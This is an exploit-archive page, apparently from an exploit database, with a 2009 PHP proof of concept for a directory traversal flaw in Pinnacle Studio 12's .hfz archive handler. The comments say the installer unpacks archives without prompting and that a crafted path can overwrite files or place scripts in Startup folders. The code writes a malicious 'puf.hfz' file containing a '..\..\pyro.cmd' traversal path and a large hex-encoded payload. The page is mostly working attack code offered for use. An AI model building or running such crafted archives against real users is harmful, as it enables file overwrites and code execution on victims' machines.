[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Pinnacle Studio 12 (.hfz) Directory Traversal Vulnerability
# Published : 2009-05-13
# Author : Nine:Situations:Group
# Previous Title : Linux Kernel 2.6.29 ptrace_attach() Local Root Race Condition Exploit
# Next Title : Linux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit
<?php
/*
Pinnacle Studio 12 "Hollywood FX Compressed Archive" (.hfz) directory
traversal vulnerability poc
by Nine:Situations:Group::pyrokinesis
Our site: http://retrogod.altervista.org/
Software site: http://www.pinnaclesys.com/
Some keys exported from the registry:
[HKEY_CLASSES_ROOT.hfz]
@="hfzfile"
[HKEY_CLASSES_ROOT.hfzhfzfile]
[HKEY_CLASSES_ROOT.hfzhfzfileShellNew]
[HKEY_CLASSES_ROOThfzfile]
@="Hollywood FX Compressed Archive"
[HKEY_CLASSES_ROOThfzfileDefaultIcon]
@="C:\WINDOWS\Installer\{D041EB9E-890A-4098-8F94-51DA194AC72A}\_A7BEE02B_CF3C_4710_85A0_92A3876E6F9C,0"
[HKEY_CLASSES_ROOThfzfileshell]
[HKEY_CLASSES_ROOThfzfileshellOpen]
[HKEY_CLASSES_ROOThfzfileshellOpencommand]
@=""C:\Documents and Settings\All Users.WINDOWS\Documenti\Pinnacle\Content\HollywoodFX\InstallHFZ.exe" "%1""
"command"=hex(7):70,00,7e,00,46,00,78,00,6b,00,3f,00,49,00,63,00,69,00,38,00,
79,00,2b,00,37,00,32,00,6f,00,21,00,31,00,61,00,68,00,31,00,48,00,46,00,58,
00,3e,00,49,00,4d,00,53,00,27,00,73,00,50,00,7a,00,2e,00,6a,00,3d,00,34,00,
70,00,41,00,5b,00,4e,00,72,00,64,00,29,00,70,00,76,00,20,00,22,00,25,00,31,
00,22,00,00,00,00,00
Usually files are decompressed in a Pinnacle effects folder...
Problem is ... that .hfz files can be used to overwrite files on the target system
or placing scripts in Startup folders by directory traversal attacks
and InstallHFX.exe decompresses them with no prompts!
Just modified an existing .hfz file and here it is the dump ...
Also I experienced some crashes in doing this... investigating...
*/
$____path = "..\..\..\..\..\..\..\..\pyro.cmd";
$____payload = "x48x46x58x5ax48x46x58x5ax9cx07x00x00x49x00x00x00". "x00x21x00x00x00x7e". $____path. "x65x07x00x00xa8x1cx00x00x8dxc2x71x5a". "x78x9cxbdx59x7bx4cx53x57x1cxbex05xf6x10x96x6cx0b". "x33xabx2fx5ax2dxe0xe4xddxd6x84xf2x18xbdx2dx6fx04". "x8axa5x50x44x50xcbx1bx05x8ax3cxb4x22x8ex25x26xcb". "xd4x64xeex8fx2dx9bxcbxe6xd4x2cx21xd3x65x6ex59xa2". "x5bx8cx01x97xa8x89xc1x05xf7xd7xd8x12xcdxc8x12x51". "xf7x62xe0x03x5fx77xdfxedx69x2fxb7xb7xb7xb7xe5xb2". "xecxe4x77x2exe7x9ex7bxcexefx7cxf7xfbx3dxcexb9xa5". "xa8xa0x26xbfx28x3fx4fx97x42x51x54x24xaaxd9x54x99". "x5cxd1xdexadx4exd3xe3x86x3axd4xd1x9ax13x45x7ax93". "x2ax4ax51xadx16xb6x5bx41x29x5cx54x71x59xa1x76xf0". "x15x8ax0ax53x84x47xa4xa1x33x16xd5xfbx37x70x79xd3". "xc8xafx76x3bx13x54xaaxabx9fx86x32xecx3fx97x50xd6". "x4dx4cx1cx0ax2ax09x09x6fx48x0fx08x65xa1xaaxaax27". "x16xcbx7dxc8x22xf1x00x4cx7axfax90x46xb3x3bx14xe4". "x44x44x17x6ax69x61x76xeex64x6cxb6xc7x10x09x3cx4c". "x5cx9cx3cx79x1ax1bxcbxbfx95xc6xd3xddxcdx6cxdexcc". "x6cxdcx38x07x7ex9cx4exc6x6ax7dx88x76x40x3cxa9xa9". "xf7x56xaex0cx02x20x21xe1xa1x5ax2dx31x60xe2xccx19". "xbexf8x2fx04x0cxe0x07xd7xcaxcax47x5bxb7x32xa5xa5". "xb3x25x25xffx04xe4x67xfdxfax07x31x31x8fxd7xacx09". "xb4x1cxc0xb0x78xd2xd3xefxafx5ax25x0fx0fx64x60x80". "xb5x17x50xa1x8dx6bx4dx0dx53x5bx1bx00x0fx4dx33x26". "x93xc0x04x44xe6x62x63x87x95x4axc8x1dx70xa8xd5x4a". "xf0x33x7bxedxdax0fxa7x4ex49xe0x81xdbx13x4ex60x3e". "xc2x18xb1x1axdfxc9xe7x75xc6xc7xcfxa9x54xb3xcbx97". "x0bx50x4dxb9xcbx65x9bx6bx9axb0x97x98xc8xacx5dx8b". "xc6xa3xd5xabxfdxf9xf9xf1xf4x69x09x3cx44x0ax0bxff". "x22x60x7ax7ax3cx44x01xe7x86x0dx33xe4x29x56xf7x01". "x60x36xb3x0bxe9xf5x5cxe7x6dx77x99xd8xbax7fx9axb3". "xa6xc1xc0x5ex4dx26x51x7bx4dx5dxbcx28x8dx07x02x4b". "x11x5ax9ax9bx59x3cxadxadxecx6dx47x87x78x7cxb1x48". "x52x53xe1xc0x84x01x82xe7x6axcdxc0xb4xc0xbbx32x32". "xf8x2fx12x8axffx08xa4xa8xe8x6fxe0x81xc9xcaxcbxef". "x21x1bx80xb1x80xf1x1ex1fxefx01x96x99x49xf0x7cx91". "xd7x26xc4xc3x49x72x32xaex93x23x23x0bxc5x43x04x90". "x20x68xecxd8xc1x72x25x11xc2x0fxd6xacx99xd1x68x08". "x9exc3x7ax3bxf0xf8x3bx3cxd7xf3xf3xd9xb3x80x71x65". "x78x78xa1x78x88xa5x90x04x48xdcx91xe0x12x8dxe2xdf". "xbax3ex44x58x11x3cxfbxd3x6cx1cx3fxa2x61x48x60x5c". "x3fx77x4ex06x1ex22x34x3dx55x5fxcfx20xa0xe0xc3xac". "xcexecx6cxc1x8bx03x46xd2xd2xd5x04xcfx50x8ax15x78". "x66x96x2dx93x88x77x79xf6xe2x0bxd2x91x27xc9xa8x54". "x82x64x48xf0x70x65xdfx6bx65x7fxa8x54x4fx34x1ax8c". "x14xc5x83x80xadxabx63x75xbax5cx9exd4x27x0fx12x5f". "xe7xddx15x2bx18xa3x91x6fx3bx0excfx50x42xb9xc7x5e". "x08xf3x82x02x7fx3cx44x1bx49x74x48xc2xc8x2dxd8xd0". "x17x89x87x64x39x6cx1cx10x01xa4xb7x12xcax89xdbx60". "x00x1axe4xeax8fx67xefx5exa6xa2xe2xc1xf6xedx32xc9". "x09x18xefx49x49xdcxeex79x43xadxbex2cxd8x6dxe3xe3". "x81x07xb6xf3xc7x63x77x6fx0ax70x4bxd1xb5xf2xf2x7e". "x97x89x87x64xe0x94x14xa9x7dxdfx68x84xcbx71xc0x82". "x2exb4x6bx17x0bx15x3bxbbx1cx3cx71x71xacx17x91xb8". "x93x90xacx2cxcexb2xd2xabx20xbdx60x77x40x86x41x1e". "x16x3dxf9x70x27xccx20x2bx86x2cx12x60xb0x5bxc1xc3". "xe1xeax84x1cx04x20x12x20x4ex65x12x53x2cx96x5bx34". "x7dx2ex3bxfbxebxf0xf0xe7x15x0axc5xf8xf8x38x17x59". "x4axa5xb2x25xc1x66x30x0cxe7xe5x9dxedxefx9fx95xed". "xa8x90xe2xe2x69x72x50x04x1bx88x3ex89x00x3cx5axff". "xd5x65xc7xe1x0fx8ax9dx1fx97xb8xb0xb4xc9x74xe1xd2". "xa5x4bx1cxa4x88xb0x70xbbxe9xddxa2xa2xefx2ax2bxef". "x6dxd9xc2x1exedxf8x0cx87xfexb5x82xd0xc3x60xd8x0e". "x48x36x6dx62x7bxbaxbax44x86x61x39x7cx36x69x34x9a". "xbaxbaxfax77x68x27xf0x64x64x7cx8ex1ex0ex0fxdaxb5". "xbax01x9axbex68xb3x3dx82x4ex37x9fxf7x17xf3xd1x84". "x97xb2xf3x92x15xd9x4fx39x99x98x98x20xebxe2xdcx65". "x50x26xefxd1x37x64x19x3ex8bx8ax8axe2xe3xc9x32x9c". "xacxa8xb8xd3xdexcex8ex87x1bx00x0cxf4x2cx06x12x72". "x14xdcx1bx2cx35x34x30x4dx4dx9exc3x06x61x9bx4fx85". "xcbxe5x22x5fx99xfcxcdxe2x99xb0x88x92x92x5fx0ax0a". "xfexc4x78xf8x21x08x07x4bx7dx7dx8cxc3xc1x48x7fxbc". "x04x75x72xacx0exdfx6ex6bx63x4dx09x23x92xd0x4bx4d". "x3dx74x3bx70x01xc2xdax9cx63x55x55x8fx89x12x4cx21". "xd2xd8xc8x12x0ex9dx38x4dxc9x66x69xdbx36x76x5bx81". "x12xe0x21xa9x60x70x90xedx17x10xc2x95xc9xc9x49xda". "xf0x49x75xb5x30x10xb8x2fx17x38x52x6fxafxd4xf7x54". "x50x41x74xecxdexedxc9x4bx50x88x36x10xe2xd8x1fx1d". "x9dx0ex2ax38x24x37x6fxdex8cx8cx8cxb4x5ax67x02xe9". "x01x12x58x1fxc1x8bxb7x83x06xecx5cx65x65x77x65x13". "x05xc1x7bxd9xddx99x13x0axe1x51xa4x93xa6xcfx47x46". "xc6x28x95x85x36x5bx90x0fx6dxbbx7bx0bx20xfex83x78". "x21x9cxcbx76x27xbbx3bx3bxe1x8axbdx0fx07x57x34x48". "x42x58x28xedxb0x54x67x27x1bx14x08x3dx72xe0x44xbc". "xc8x86x04x72x48x03x84x93x2cx07xcex83x6ex79xfex82". "xb4x06xaexc8xdbxe5xe6xdexe1x82xd7x5fx42x4cx11xe4". "x68x07x6fx87xc8xcex2ax5cxc0xf6xf7x33x24x53xc9x16". "xd0x02x25x7bxf6x2cx4ax89xc9x74x0bx2ex84x24x40x72". "xf8xe2x45xdex09x53x20x41x7fx71xfaxffx85x6fx71x4b". "x85x4dx67x45x7ax9bx0ax9fxffx75x91x2bx0ax4fx25x17". "xaexc1xfexf0x48xb3x8dx70xfex14x3cx8axe1xcdx3dx92". "x5fx5exadx9dx43x63xfcx39xafx66x93x8axb4xc2xa9x08". "xd1x5fx36x97x84xf4xabxe7xd5xb1xd2x1cxe1xbcx0bx63". "xa5xc6xd6x96xf8x11x8ax1ax1dxf1x7dx46x1bxbdxf5xea". "xd8x98xcfx3cx05x59x6fx54xafxffx06x73xe8x51xc1x82". "xc6xf9xeaxc3x49xe8xf3xbcx04x5cxe3x08x30x87x42x00". "x1dx4cxf1x47x47x96x89x01x0ax3ax0fxc4x19x7dx1fx2d". "xa1xd2x22xedx23x85xbfx66x4ax12x27x24x20x54x43x51". "x65xf9x79x5axd6xb7x8exbdx38xffx88xa2x5ex40x2dx72". "xf6xf6xa9xabxdbx9bx9ax9dx6axbdxf0x3ex82xe2x8fx16". "x96x97xd6xe2x72xc4xabxf9xb8x94x66xadxf0x7ex21x9a". "x4fx48x69xd6x09xefx43xd1x5cx69x2dxd0x9ex44xe3xed". "x68xfex58xf7x7fx0cx1cx8dx3bx9ax7ax9cxddx6ax3dx45". "x0dx19xe7xabxb8x36x91xa2xa0xc2x28x12x93x34xedx3f". "xcdx4bxbfx58xe1x59xabxc9x8bx14x25xccx7dx65x11x0f". "xe3xefx01x1fxc4xacx37x7bx08x15x81xcbxd5xf3x5dxd4". "x20xfaxccx22x60xa5xe1x1ex0fx09x2exfbx3fx95x68x4f". "x65xdbx2fxcfxc3x3dx18x00xaex4ex16xbbxc1xe0x9ex90". "x0bx37xd7x54xa6xebx45xb3xfbx55x3ex5cxf6x61x99xa3". "xbdx4bx9dxebxe8x6cxeex71xf8x68xa3x03x69xbfxd2x13". "x6bx46x7ax7bx9dxa2xb6x99xacxdfx1excdxf1x56xf6x99". "xe2xbdxf7xa3x15x0axdex34xd7xf5xf5x16x73x89xf6x53". "x34x69x15x7fxe9x67x29xe2x8ax6axfdx3axb4xf6x76xf7". "x38x9bxbax1dx7dx6dxfbx32x2dx0dxdbx9bx1bxfbx7ax33". "xd3xd2xd4xc9xeax5cx67x67xa7xb3x2bx93x0cx4cx69x6b". "x71x0ax40x8dx0ax38xa0x79x55xbcx28xdcx21x21xdcx3e". "x10x84x5ex98x26x3fx98x05x1dx8ex3exb5x36x04x98x64". "xa0x17x66x65xd6x8dx9cx75x75xc6x91xefxefxfexe4x93". "xedx96x7ex99x6exf4x56x0fx24x31x98x07xa4x61x9axc5". "x61xeax42x85xa9xe3xb1x19x34x99x4bxc0x3cx28x0exf3". "x5fx77x19xc2x8ex00x00x48x46x58x5ax28x00x00x00x44". "x00x00x00x00x11x00x00x00x7ex6fx72x67x73x3ax65x66". "x66x65x63x74x73x2ex6fx72x67x00x00x00x00x00x00x00". "x00x00x00x00x00x34x00x00";
$_f = fopen("puf.hfz", "w+");
fputs($_f, $____payload);
fclose($_f);
?>
# www.Syue.com [2009-05-13]